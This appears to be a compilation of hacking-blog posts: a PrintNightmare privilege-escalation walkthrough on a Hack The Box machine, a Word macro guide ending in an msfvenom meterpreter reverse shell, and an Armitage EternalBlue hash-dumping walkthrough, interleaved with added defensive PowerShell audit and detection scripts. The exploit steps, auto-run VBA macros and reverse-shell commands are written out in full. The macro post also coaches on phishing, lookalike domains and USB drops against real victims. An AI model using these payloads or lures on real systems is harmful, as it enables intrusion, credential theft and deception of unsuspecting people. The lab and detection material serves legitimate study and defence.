PrintNightmare Privilege Escalation

Hello world, welcome to Haxez. In this post, I’m going to be demonstrating how to perform the PrintNightmare privilege escalation exploit. I will be using Evil-WinRM and the CVE-2021-1675.ps1 script by Caleb Stewart on GitHub. I’ve just completed the retired easy Hack The Box machine Driver and was blown away by this vulnerability. It’s easy to see why it is such a serious vulnerability.

What Is PrintNightmare?

The vulnerability exists because the Spooler service does not properly validate the driver when it is installed on a system. This can allow an attacker to install a malicious driver. Once installed, an attacker can exploit the vulnerability in the Print Spooler service to execute arbitrary code with system-level privileges.

This vulnerability can be exploited even if the user account used to install the driver has limited privileges. This is because the Print Spooler service runs with system-level privileges. This means that it has the ability to install and execute drivers with elevated privileges.

To mitigate the risk of exploitation, it is important to apply the appropriate patches and updates provided by Microsoft. Additionally, other measures can be put in place, such as restricting access to the Spooler service or disabling it altogether on systems that do not need it.
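As an added example (not code from the original post), the following PowerShell audit checks the host-side conditions the rest of this post relies on and applies the corresponding mitigations. The registry names are the documented Group Policy backing values for Point and Print and for "Allow Print Spooler to accept client connections"; the function names are my own.

```powershell
# Added audit/mitigation script for the PrintNightmare conditions described above.
# Run elevated on the host being checked. Function names are this example's own;
# the registry paths and value names are the Group Policy backing values.

$PrintersPolicy   = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers'
$PointAndPrintKey = Join-Path $PrintersPolicy 'PointAndPrint'

function Get-RegValue {
    param([string]$Path, [string]$Name)
    if (-not (Test-Path $Path)) { return $null }
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$Name
}

function Test-PrintNightmareExposure {
    $findings = New-Object System.Collections.Generic.List[string]

    # 1. Is the Spooler service running? No spoolsv.exe, no MS-RPRN endpoint to abuse.
    $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    $spoolerRunning = ($null -ne $spooler) -and ($spooler.Status -eq 'Running')
    if ($spoolerRunning) {
        $findings.Add('Spooler service is running; MS-RPRN (spoolsv.exe) is reachable by RPC clients.')
    }

    # 2. Remote client connections. Value 2 means the policy "Allow Print Spooler to
    #    accept client connections" is Disabled, which blocks the remote variant.
    $remoteRpc = Get-RegValue $PrintersPolicy 'RegisterSpoolerRemoteRpcEndPoint'
    if ($spoolerRunning -and $remoteRpc -ne 2) {
        $findings.Add('Spooler accepts remote client connections (RegisterSpoolerRemoteRpcEndPoint is not 2).')
    }

    # 3. Point and Print restrictions. Microsoft's hardened default requires admin
    #    rights to install printer drivers; an explicit 0 re-opens the hole.
    $restrict = Get-RegValue $PointAndPrintKey 'RestrictDriverInstallationToAdministrators'
    if ($null -ne $restrict -and $restrict -eq 0) {
        $findings.Add('RestrictDriverInstallationToAdministrators is 0: non-admins may install printer drivers.')
    }
    # These two values suppress the install/update warnings and elevation prompts.
    foreach ($name in 'NoWarningNoElevationOnInstall', 'UpdatePromptSettings') {
        $v = Get-RegValue $PointAndPrintKey $name
        if ($null -ne $v -and $v -ne 0) {
            $findings.Add("$name is $v: driver install/update prompts are suppressed.")
        }
    }

    $startType = if ($null -ne $spooler) { $spooler.StartType } else { 'NotInstalled' }
    [PSCustomObject]@{
        ComputerName   = $env:COMPUTERNAME
        SpoolerRunning = [bool]$spoolerRunning
        StartupType    = $startType
        Findings       = $findings
        Exposed        = ($findings.Count -gt 0)
    }
}

function Set-PrintNightmareMitigation {
    # -DisableSpooler is for hosts that never print or share printers (e.g. domain
    # controllers); otherwise the spooler stays up but stops accepting remote clients.
    param([switch]$DisableSpooler)
    if (-not (Test-Path $PointAndPrintKey)) { New-Item -Path $PointAndPrintKey -Force | Out-Null }
    Set-ItemProperty -Path $PointAndPrintKey -Name RestrictDriverInstallationToAdministrators -Value 1 -Type DWord
    foreach ($name in 'NoWarningNoElevationOnInstall', 'UpdatePromptSettings') {
        Remove-ItemProperty -Path $PointAndPrintKey -Name $name -ErrorAction SilentlyContinue
    }
    if ($DisableSpooler) {
        Stop-Service -Name Spooler -Force
        Set-Service -Name Spooler -StartupType Disabled
    } else {
        if (-not (Test-Path $PrintersPolicy)) { New-Item -Path $PrintersPolicy -Force | Out-Null }
        Set-ItemProperty -Path $PrintersPolicy -Name RegisterSpoolerRemoteRpcEndPoint -Value 2 -Type DWord
        Restart-Service -Name Spooler
    }
}

Test-PrintNightmareExposure | Format-List
```

Run `Test-PrintNightmareExposure` first; only call `Set-PrintNightmareMitigation` once you know whether the host needs to keep printing, since `-DisableSpooler` removes printing entirely.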

The Scenario

A threat actor has obtained network access and a domain user’s credentials, whether through phishing or some other social engineering attack. They can check for the spooler service on the target host with the ‘impacket-rpcdump’ tool. If the following protocol appears in the output, then the host could be a good candidate for the exploit.

┌──(kali㉿kali)-[~/Driver/scripts]
└─$ impacket-rpcdump @10.129.95.238               
--snip--
Protocol: [MS-RPRN]: Print System Remote Protocol 
Provider: spoolsv.exe 
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0 
Bindings: 
          ncacn_ip_tcp:10.129.95.238[49410]
          ncalrpc:[LRPC-188127abacea381ad9]
--snip--
PrintNightmare impacket-rpcdump

The PrintNightmare Payload

In order to leverage this vulnerability to elevate privileges, we first need a payload to exploit it. Such an exploit is publicly available on GitHub right now at the following URL https://github.com/calebstewart/CVE-2021-1675. We can use wget on our attack box to download this payload and store it in our scripts directory.

┌──(kali㉿kali)-[~/Driver/scripts]
└─$ wget https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1
--2023-03-17 18:04:25--  https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 2606:50c0:8000::154, 2606:50c0:8001::154, 2606:50c0:8002::154, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8000::154|:443... failed: Network is unreachable.
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8001::154|:443... failed: Network is unreachable.
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8002::154|:443... failed: Network is unreachable.
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|2606:50c0:8003::154|:443... failed: Network is unreachable.
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 178561 (174K) [text/plain]
Saving to: ‘CVE-2021-1675.ps1.1’

CVE-2021-1675.ps1.1                     100%[============================================================================>] 174.38K  --.-KB/s    in 0.03s   
2023-03-17 18:04:26 (4.96 MB/s) - ‘CVE-2021-1675.ps1.1’ saved [178561/178561]
Wget CVE-2021-1675

The Foothold

We will need user credentials in order to perform this exploit. These could be obtained through many nefarious methods but I will leave that to your imagination. Once we have the credentials, we can connect to the box via the Evil-WinRM tool. As you can see from the output below, I’m connecting to the target host with the user tony. Furthermore, the password for tony’s account is ‘liltony’. I’ve specified the target IP address with the ‘-i’ flag and I’ve also specified my script directory with the ‘-s’ flag.

┌──(kali㉿kali)-[~/Driver]
└─$ evil-winrm -i 10.129.95.238 -u 'tony' -p 'liltony' -s /home/kali/Driver/scripts/
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tony\Documents> menu

   ,.   (   .      )               "            ,.   (   .      )       .   
  ("  (  )  )'     ,'             (     '    ("     )  )'     ,'   .  ,)  
.; )  ' (( (" )    ;(,      .     ;)  "  )"  .; )  ' (( (" )   );(,   )((   
_".,_,.__).,) (.._( ._),     )  , (._..( '.._"._, . '._)_(..,_(_".) _( _')  
\_   _____/__  _|__|  |    ((  (  /  \    /  \__| ____\______   \  /     \  
 |    __)_\  \/ /  |  |    ;_)_') \   \/\/   /  |/    \|       _/ /  \ /  \ 
 |        \\   /|  |  |__ /_____/  \        /|  |   |  \    |   \/    Y    \
/_______  / \_/ |__|____/           \__/\  / |__|___|  /____|_  /\____|__  /
        \/                               \/          \/       \/         \/

       By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers
[+] Dll-Loader 
[+] Donut-Loader 
[+] Invoke-Binary
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit
PrintNightmare Evil-WinRM

The Exploit

We can now load the script that we saved to our script directory earlier by typing the script name (CVE-2021-1675.ps1). This will then load additional options into Evil-WinRM including the ability to ‘Invoke-Nightmare’. Typing ‘Invoke-Nightmare’ will then generate a new payload that will create a new user and add the user as a local administrator.

*Evil-WinRM* PS C:\Users\tony\Documents> CVE-2021-1675.ps1
*Evil-WinRM* PS C:\Users\tony\Documents> menu

   ,.   (   .      )               "            ,.   (   .      )       .   
  ("  (  )  )'     ,'             (     '    ("     )  )'     ,'   .  ,)  
.; )  ' (( (" )    ;(,      .     ;)  "  )"  .; )  ' (( (" )   );(,   )((   
_".,_,.__).,) (.._( ._),     )  , (._..( '.._"._, . '._)_(..,_(_".) _( _')  
\_   _____/__  _|__|  |    ((  (  /  \    /  \__| ____\______   \  /     \  
 |    __)_\  \/ /  |  |    ;_)_') \   \/\/   /  |/    \|       _/ /  \ /  \ 
 |        \\   /|  |  |__ /_____/  \        /|  |   |  \    |   \/    Y    \
/_______  / \_/ |__|____/           \__/\  / |__|___|  /____|_  /\____|__  /
        \/                               \/          \/       \/         \/

       By: CyberVaca, OscarAkaElvis, Jarilaos, Arale61 @Hackplayers
[+] Add-Win32Type 
[+] Dll-Loader 
[+] Donut-Loader 
[+] field 
[+] func 
[+] get_nightmare_dll 
[+] Invoke-Binary 
[+] Invoke-Nightmare 
[+] New-InMemoryModule 
[+] psenum 
[+] struct
[+] Bypass-4MSI
[+] services
[+] upload
[+] download
[+] menu
[+] exit

*Evil-WinRM* PS C:\Users\tony\Documents> Invoke-Nightmare
[+] using default new user: adm1n
[+] using default new password: P@ssw0rd
[+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"
[+] added user  as local administrator
[+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll
PrintNightmare Invoke-Nightmare
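The Invoke-Nightmare run above leaves traces on the target: a printer driver is added, the spooler loads (and later fails to find) a plug-in DLL from a user’s Temp directory, and a new local user is created and added to Administrators. As an added example that is not part of the original post, this PowerShell script hunts for that sequence in the Windows event logs; the event IDs are Microsoft’s, the function names and the five-minute correlation window are my own choices.

```powershell
# Added hunting script for the artefacts of the exploit shown above. Run elevated
# on the host being checked. Caveat: Microsoft-Windows-PrintService/Operational is
# disabled by default; enable it with
#   wevtutil sl Microsoft-Windows-PrintService/Operational /e:true
# before relying on event 316.

# Regex matching BUILTIN\Administrators however the 4732 message renders it.
$AdminGroupPattern = 'S-1-5-32-544|BUILTIN\\Administrators'

function Get-EventsSafe {
    param([hashtable]$Filter)
    # Get-WinEvent throws when a log is missing or has no matches; treat as "no events".
    try { Get-WinEvent -FilterHashtable $Filter -ErrorAction Stop } catch { @() }
}

function Get-PrintNightmareIndicators {
    param([int]$Hours = 24)
    $since = (Get-Date).AddHours(-$Hours)

    $events = @()
    # 316: "Printer driver ... was added or updated"
    $events += Get-EventsSafe @{ LogName = 'Microsoft-Windows-PrintService/Operational'; Id = 316; StartTime = $since }
    # 808: "The print spooler failed to load a plug-in module ..."
    $events += Get-EventsSafe @{ LogName = 'Microsoft-Windows-PrintService/Admin'; Id = 808; StartTime = $since }
    # 4720: user account created; 4732: member added to a security-enabled local group
    $events += Get-EventsSafe @{ LogName = 'Security'; Id = 4720, 4732; StartTime = $since }

    foreach ($e in ($events | Sort-Object TimeCreated)) {
        $msg = [string]$e.Message
        $reason = switch ($e.Id) {
            316  { 'printer driver added or updated' }
            808  { 'spooler failed to load a plug-in module' }
            4720 { 'local user account created' }
            4732 { if ($msg -match $AdminGroupPattern) { 'member added to BUILTIN\Administrators' }
                   else { 'member added to a local group' } }
        }
        # A plug-in module under a user profile (like the Temp\nightmare.dll above) is far
        # more suspicious than one under the spool directory; so is a new Administrators member.
        $hot = ($e.Id -eq 808 -and $msg -match '\\Users\\') -or
               ($e.Id -eq 4732 -and $msg -match $AdminGroupPattern)
        [PSCustomObject]@{
            Time   = $e.TimeCreated
            Log    = $e.LogName
            Id     = $e.Id
            Reason = $reason
            Hot    = $hot
            Detail = ($msg -split "`r?`n")[0]
        }
    }
}

function Find-PrintNightmareClusters {
    # A spooler event (316/808) followed within $WindowMinutes by a 4720 AND a 4732
    # into Administrators is exactly the sequence Invoke-Nightmare produces.
    param([int]$Hours = 24, [int]$WindowMinutes = 5)
    $ind = @(Get-PrintNightmareIndicators -Hours $Hours)
    foreach ($spool in ($ind | Where-Object { $_.Id -in 316, 808 })) {
        $end     = $spool.Time.AddMinutes($WindowMinutes)
        $follow  = $ind | Where-Object { $_.Time -ge $spool.Time -and $_.Time -le $end }
        $created = @($follow | Where-Object { $_.Id -eq 4720 })
        $added   = @($follow | Where-Object { $_.Id -eq 4732 -and $_.Hot })
        if ($created.Count -gt 0 -and $added.Count -gt 0) {
            [PSCustomObject]@{
                Start        = $spool.Time
                Trigger      = "$($spool.Id): $($spool.Detail)"
                UsersCreated = $created.Count
                AddedToAdmin = $added.Count
            }
        }
    }
}

Get-PrintNightmareIndicators | Format-Table -AutoSize
Find-PrintNightmareClusters  | Format-List
```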

The Consequence

We are now able to remote into the target system with the new user. As you can see from the output below, the new user is a member of the local Administrators group. From here we could install persistence or perform an LSA dump to pull credentials from memory. If a Domain Administrator has logged in to this system, then it would be game over for the domain controller.

┌──(kali㉿kali)-[~]
└─$ evil-winrm -i 10.129.95.238 -u 'adm1n' -p 'P@ssw0rd' -s /home/kali/Driver/scripts/
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\adm1n\Documents> net localgroup
net.exe : System error 1312 has occurred.
    + CategoryInfo          : NotSpecified: (System error 1312 has occurred.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
A specified logon session does not exist. It may already have been terminated.
*Evil-WinRM* PS C:\Users\adm1n\Documents> whoami /groups

GROUP INFORMATION
-----------------
Group Name                                                    Type             SID          Attributes
============================================================= ================ 
Everyone                                                      Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114    Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                                        Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                                                 Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                                          Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                              Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                                Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account                                    Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                              Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level                          Label            S-1-16-12288
*Evil-WinRM* PS C:\Users\adm1n\Documents> 
Game Over

PrintNightmare Conclusion

I know that this is an old vulnerability but I recently stumbled on a box that let me pull it off. I thought it was fascinating and was blown away by how simple it was. Granted, that’s down to the developers of the exploit and the developers of Evil-WinRM. However, if I can pull off an exploit like this then anybody can. All it takes is a few misconfigured permissions and the whole domain is at risk. Anyway, I wanted to write a post about it because I thought it was a cool exploit.

Making Malicious Microsoft Office Files For Hacking

Hello world and welcome to HaXeZ, in this post I’m going to be explaining how you can hack anyone with a Microsoft Office Document. Ok, nothing is ever going to work 100% of the time. I was going through the Red Team Weaponization room on TryHackMe and I loved this technique so much that I wanted to make a separate post on it.

Microsoft Office Visual Basic

Microsoft Office applications have a feature that allows them to support Visual Basic programs, or macros. Furthermore, these macros can be used to automate manual tasks to make the user’s life easier. However, we will be using these programs for something far more nefarious. In order to get started we need to create a new Word document. Once you have the document open, navigate to the View tab, click on Macros, then View Macros.

Microsoft Office Visual Basic

Creating A Macro In Microsoft Office

With the Macro window open, give your new sinister macro a name as shown in the screenshot below. You also need to ensure that the current document is selected from the dropdown menu. Once you have made those changes, click create.

Creating A Macro In Microsoft Office

A new window should pop up with the title Microsoft Visual Basic for Applications. Within this window should be your Document1 macro editor. For our first macro, all we’re going to do is have the document spawn a dialog box with a message. This can be achieved with the snippet of code below.

Sub THM()
  MsgBox ("YOU HAS BEEN HAXED!!!")
End Sub
Visual Basic Script

Running the Microsoft Office Macro

Next, we need to test that the Macro works. This can be done by simply clicking the green triangle icon within the macro window. This will execute the Visual Basic code which should create the message box. Fantastic, you have created your first macro. However, this doesn’t really accomplish anything as the user would have to open the macros themselves in order to run it.

Running the Macro

Automatic Macro Execution (sort of)

We can configure the macro to automatically execute when the document is opened (sort of). The user will still need to enable macros, but once they have, the macro will execute. This can be done by editing the macro and adding the Document_Open and AutoOpen functions. You also need to specify which function to execute; in our case it is the EvilMacro function. The code will look similar to the snippet below.

' Word runs Document_Open (and the older AutoOpen) when the document is opened
' and macros are enabled; both simply hand off to EvilMacro.
Sub Document_Open()
  EvilMacro
End Sub

Sub AutoOpen()
  EvilMacro
End Sub

' The actual payload: for now just a message box.
Sub EvilMacro()
   MsgBox ("YOU HAS BEEN HAXED!!!")
End Sub
Automatic Macro Execution (sort of)

In order for the macro to work, it needs to be saved in a macro-enabled format such as .doc or .docm. To do this, save the document as a Word 97-2003 Template. Go to File, save Document1, choose the save-as type Word 97-2003 Document and finally, save. Now if you close the document and reopen it, you may get a warning message saying that macros need to be enabled. Click enable and the macro will run.
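Whether the warning bar above appears, and whether clicking it helps, is decided by Word’s macro security setting and by the policy that blocks macros in files downloaded from the internet. As an added example (not from the original post), this PowerShell audit reports how Word on the current machine would treat a document like the one just saved and can apply the hardened values; the registry names are Microsoft’s documented Trust Center and policy values, the function names are my own.

```powershell
# Added audit script for Word's macro handling. VBAWarnings values:
#   1 = enable all macros (no prompt)
#   2 = disable with notification (the "enable macros" bar above; Word's default)
#   3 = disable all except digitally signed macros
#   4 = disable all macros without notification
# blockcontentexecutionfrominternet = 1 blocks macros in files carrying the Mark of
# the Web regardless of what the user clicks.

$WordVersions = '16.0', '15.0', '14.0'   # Office 2016/365, 2013, 2010

function Get-RegDword {
    param([string]$Path, [string]$Name)
    if (-not (Test-Path $Path)) { return $null }
    (Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue).$Name
}

function Get-WordMacroPolicy {
    foreach ($v in $WordVersions) {
        $policy = "HKCU:\Software\Policies\Microsoft\Office\$v\Word\Security"
        $user   = "HKCU:\Software\Microsoft\Office\$v\Word\Security"
        if (-not (Test-Path $user) -and -not (Test-Path $policy)) { continue }  # version not present

        # A value set by policy (GPO) overrides the user's Trust Center choice.
        $warn = Get-RegDword $policy 'VBAWarnings'; $source = 'policy'
        if ($null -eq $warn) { $warn = Get-RegDword $user 'VBAWarnings'; $source = 'user' }
        if ($null -eq $warn) { $warn = 2; $source = 'default' }

        $motw = Get-RegDword $policy 'blockcontentexecutionfrominternet'
        if ($null -eq $motw) { $motw = Get-RegDword $user 'blockcontentexecutionfrominternet' }

        $verdict = switch ($warn) {
            1 { 'WEAK: all macros run without prompting' }
            2 { 'PROMPT: user can click Enable Content (the scenario above)' }
            3 { 'OK: only digitally signed macros can run' }
            4 { 'OK: macros disabled without notification' }
            default { "UNKNOWN VBAWarnings value $warn" }
        }
        [PSCustomObject]@{
            Version      = $v
            VBAWarnings  = $warn
            Source       = $source
            BlockFromWeb = ($motw -eq 1)
            Verdict      = $verdict
        }
    }
}

function Set-WordMacroHardening {
    # Writes the hardened settings into the policy hive for every Word version found.
    param([ValidateSet(3, 4)][int]$VBAWarnings = 3)
    foreach ($entry in Get-WordMacroPolicy) {
        $policy = "HKCU:\Software\Policies\Microsoft\Office\$($entry.Version)\Word\Security"
        if (-not (Test-Path $policy)) { New-Item -Path $policy -Force | Out-Null }
        Set-ItemProperty -Path $policy -Name VBAWarnings -Value $VBAWarnings -Type DWord
        Set-ItemProperty -Path $policy -Name blockcontentexecutionfrominternet -Value 1 -Type DWord
    }
}

Get-WordMacroPolicy | Format-Table -AutoSize
```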

Popping Programs with Microsoft Office

That’s great and all but it doesn’t really do anything other than tell the user you hacked them. However, we can expand the functionality to do other things like launching programs. A standard proof of concept in penetration testing is showing that you had the ability to launch the calculator. This can be done by declaring a payload variable as a string using the Dim keyword. Then we specify calc.exe as the payload. Lastly, we create a Windows Scripting Host object to execute the payload. The script should look like the snippet below. Follow the same steps as before to save and close the document, then opening the document again should open the calculator.

' Both open-handlers hand off to EvilMacro, as before.
Sub Document_Open()
  EvilMacro
End Sub

Sub AutoOpen()
  EvilMacro
End Sub

Sub EvilMacro()
	' The program to launch, held in a string variable.
	Dim payload As String
	payload = "calc.exe"
	' Windows Script Host runs the payload; the second argument (0) hides the window.
	CreateObject("Wscript.Shell").Run payload, 0
End Sub
Popping Programs in Microsoft Office

Injecting Some Venom

With the proof of concept out the way, it’s time to apply it to a real-world scenario. Microsoft Office Visual Basic Applications can be used to create reverse shells back to your attack box. For the purposes of this article, I will be using the TryHackMe labs as I couldn’t get it to work on my own Windows 10 lab. I did tinker with it for a few hours but was unsuccessful. The TryHackMe lab does have Windows Defender turned off.

Firstly, we need to create a macro payload to add to our Microsoft Word document. This can be done using the following msfvenom command, replacing the X’s with your attack box’s IP address and desired port:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=X -f vba

Once the payload has been generated, you need to add it as a new macro to your Office Word document. You also need to change the last line from Workbook_Open() to Document_Open() unless you’re working with Excel documents. Then, save the document as a Word 97-2003 Document.

Injecting Some Venom in to Microsoft Office

Catching The Reverse Shell

The last step of the exploit is to capture the reverse shell once the document has been opened. In order to do this, we’re going to use Metasploit’s multi-handler. This can be done by typing use exploit/multi/handler. We’re then going to set the payload of windows/meterpreter/reverse_tcp. Finally, we’re going to set the LHOST and LPORT to the same values that we used in the msfvenom payload.

Catching The Reverse Shell
Exploit Complete

Triggering The Payload

When the victim opens the document, they will be greeted with a warning message that macros have been disabled. However, if you are using email as your delivery method then you can explain to the victim that it is important for them to enable macros. The victim then enables the macro, the payload executes and the reverse shell connects back to your attack box. You should now have a meterpreter shell on the victim’s machine.

Triggering The Microsoft Office Payload

Microsoft Office Delivery Methods

There are a number of different delivery methods that you can use to get the document into the hands of your victim. It is important to choose your victim appropriately when trying to compromise your target. For example, if you sent your payload to the head of the security team then your chances of success would likely be low. However, if you chose someone in the finance or sales department, someone with less IT security knowledge but who may still have a high level of access, then your success rate could be higher.

USB Delivery

USB delivery can be a powerful delivery mechanism to get malware onto a victim’s computer. Curiosity killed the cat and in this case, could compromise a network. If you were to load a USB device with the document and then label the document with something like “confidential” or “important”, I bet someone would want to take a peek at the contents.

Web Delivery

Web delivery is a convenient way to serve the malicious document to an unsuspecting victim. You could send the URL to the victim in an email, SMS, or other messaging technology. It also has the benefit of being more dynamic, in that you can host multiple different payloads and make modifications to them. The USB delivery technique is a one-and-done, but web delivery gives you more flexibility. The victim need only download the file and open it.

Email Delivery

Email delivery is a great option for a delivery technique, provided the document doesn’t get flagged by antivirus. Furthermore, emails can be spoofed, or you can register domain names similar to the victim’s domain so that the email seems more legitimate. For example, if you had a victim with the email address [email protected] then you could register mydoma1n.com and send them an email from [email protected]. Granted, it stands out, but there are sneakier ways to do this. You can use alt codes and characters from different alphabets to make it stand out less.

Furthermore, you could add context to the email. You could flag the email as important and explain to the user that they need to enable macros. If this email was then sent to a less technical employee and seemingly came from the IT department then it would increase the chances of compromise. This method exploits the trust the user has for the domain. It could be considered a social engineering attack.

Conclusion

Ok, the title of this post was clickbait and for that, I apologize. Granted, the content of this post isn’t going to allow you to hack anyone with an Office document. The victim’s environment would have to be configured in such a way as to not detect the payload. Furthermore, you would have to trick them into running macros through some social engineering attack. However, there are many organizations out there that run outdated operating systems and versions of Microsoft Office. This attack could potentially work on outdated systems, which is why you should keep your software up to date. Anyway, I had a fun but frustrating time trying to get this to work. I hope you enjoyed it.

Dumping Windows NTLM Password Hashes With Armitage C2

Hello world and welcome to HaXeZ, in this post I’m going to explain how to dump NTLM hashes using Armitage. Armitage (created by Raphael Mudge) is a C2 or command and control application that provides a GUI for Metasploit. Furthermore, it allows for the creation of team servers, which allow multiple users to interact with the same workspace. I decided to make this post due to the difficulties I had with the Introduction to C2 room on TryHackMe.

Setting Up Armitage

First, we need to set up Armitage. In order to do this, we need to clone the GitLab repository found here. Next, we need to run the package.sh script to set it up. Once the setup is complete, we need to start Postgresql.

systemctl start postgresql

Once Postgresql is up and running, we need to drop the existing Metasploit database and initialize a new one. This can be achieved by running the msfdb delete and msfdb init commands as shown below. Please be advised that the screenshots are from the attack box on TryHackMe.

Setting Up Armitage

Creating Armitage Team Server

While this isn’t entirely necessary, we will next use the teamserver binary located at /opt/armitage/releases/unix to create a teamserver. In order to create the teamserver, we need to run the binary followed by our IP and password. The IP is your eth0 IP and the password is anything you want it to be.

./teamserver <YOUR-IP> <YOUR-PASSWORD>
Creating Armitage Team Server

Starting Armitage

Next, we need to start the C2 or Command and Control application itself. In order to do this, we need to run the Armitage binary from the /opt/armitage/releases/unix directory. No other arguments are needed, just punch it into the CLI and wait for the window.

Starting Armitage

Connecting

Once you run the binary, a window will pop up. Using the information from the teamserver CLI, populate the required information. The application will then attempt to connect to the Postgresql database with the supplied credentials (you remember your password, right?). The reason we need to connect to the database is that Armitage heavily relies on the Metasploit database.

Connecting

Armitage Nickname

This is by far the most important part of any engagement. Whether it’s Red Teaming, Hacking, or Penetration Testing. Having an awesome hacker handle is crucial to success and without it, you will be doomed to fail. Ok, maybe not but this is the part where you need to choose your username. This is the username that your Armitage teammates will see you as so choose something incredibly cringy and embarrassing.

Nickname

Add The Target

In order to dump those precious hashes, you need a target. Again, I’m following the TryHackMe Introduction to C2 room. The target of my nefarious hacking activities will be the box named Blue which is vulnerable to Eternal Blue. In order to add the host, click hosts and click add hosts. You will then be presented with a window similar to the one below. Punch in the IP address and click ok.

Add The Target

Exploiting The Target

In order to exploit the target, we need to locate the Eternal Blue exploit from the menu. Under Exploit, Windows, SMB, grab the ms17_010_eternal exploit and drag it over the target. The exploit you need to use will depend entirely on the target you want to attack. I’m using Blue as the target because it is an easy machine to hack. Believe it or not, Blue loves being hacked.

Exploiting The Target

Configuring The Payload

Funnily enough, you don’t actually need to do anything to configure the payload. This section of the article is a complete waste of space. Leave the settings as default and click launch. The only reason this section of the article exists is that I took a screenshot. So yeah, drag the payload over the host. Don’t change the settings. Click launch.

Configuring The Payload

Shell To Meterpreter

If you successfully exploited the target, you should have some lovely ASCII showing WIN (provided you’re exploiting Blue). That’s fantastic, however, it isn’t. You have managed to get yourself a standard shell as NT AUTHORITY. Don’t get me wrong, this shell is good for most things but let’s face it, we want a Meterpreter shell. Well, there is an easy way to upgrade to a Meterpreter shell. Just use the search box for shell_to_meterpreter and drag it onto the host. This should spawn a new Meterpreter shell.

Shell To Meterpreter

Migrate To Exfiltrate

You now have your Meterpreter session open and sure you can attempt to dump hashes now. However, if you do, you will likely not get all the user’s hashes. At least that was my experience when attempting to dump Ted’s hash on the TryHackMe room. In order to dump Ted’s hash, we need to migrate our process. There are arguments to be made about which process to migrate to. Migrating to certain processes will be a lot more stealthy. This is something I intend to cover in future posts. However, for now, migrate to the lsass.exe process. This will give you the access required to dump the hashes. If you’re wondering how to do this then right-click the host, select Meterpreter, select Explore, then select show process. The rest is fairly straightforward.

Migrate To Exfiltrate

Dump Those Hashes

Finally, we are ready to dump the hashes. In order to get that elusive hash of Ted’s, all we need to do is click Meterpreter, Access, and Dump Hashes. You will get a number of methods; the method I chose was the Lsass method. This worked straight away and dumped Ted’s hash to the terminal, as you can see below. Granted, the administrator hash was already ours, but it’s annoying not hacking everyone, isn’t it?

Dump Those Hashes

Conclusions

Ok, I may have gone a bit overboard on the graphics. I’m also sure that this write-up is full of spelling mistakes and graphical errors. If you can forgive that, then I hope this has helped you solve the TryHackMe introduction to C2 room. I will admit that I struggled with this room having never used Armitage before. I could have rinsed it using Metasploit but that wasn’t the point of the room. God knows how long I tried to set up Armitage on my Kali virtual machine. I eventually gave up and used the TryHackMe attack box. As for Armitage itself, it could THM attack box but I thought it was slower than using Metasploit. Anyway, I had a lot of fun with this one. Big thanks to Rummy for helping out.

Hack To Learn: Vulnerability Scanning

Hello World and welcome to HaXeZ, today I’m going to be covering Vulnerability Scanning. This post is continuing the Hack To Learn series where I cover the basics of the different phases of hacking or penetration testing. So far we have covered Environment Setup, Hacking Legally, and Open Source Intelligence Gathering.

Vulnerability Scanning

Once you have completed the open source intelligence gathering phase, it’s time to start looking for vulnerabilities. Vulnerability scanning is the process of using tools to scan your target for vulnerabilities. There are many different tools that can perform vulnerability scans and the type of target you are scanning will determine what tools you use. For example, if you’re looking for vulnerabilities that affect services on the host then you could use Nmap, Nessus, OpenVAS, and many others. However, if you’re attacking a web application then you would likely use Nikto, Burp Suite, OWASP ZAP, or some other tool.

Nmap Vulnerability Scanning

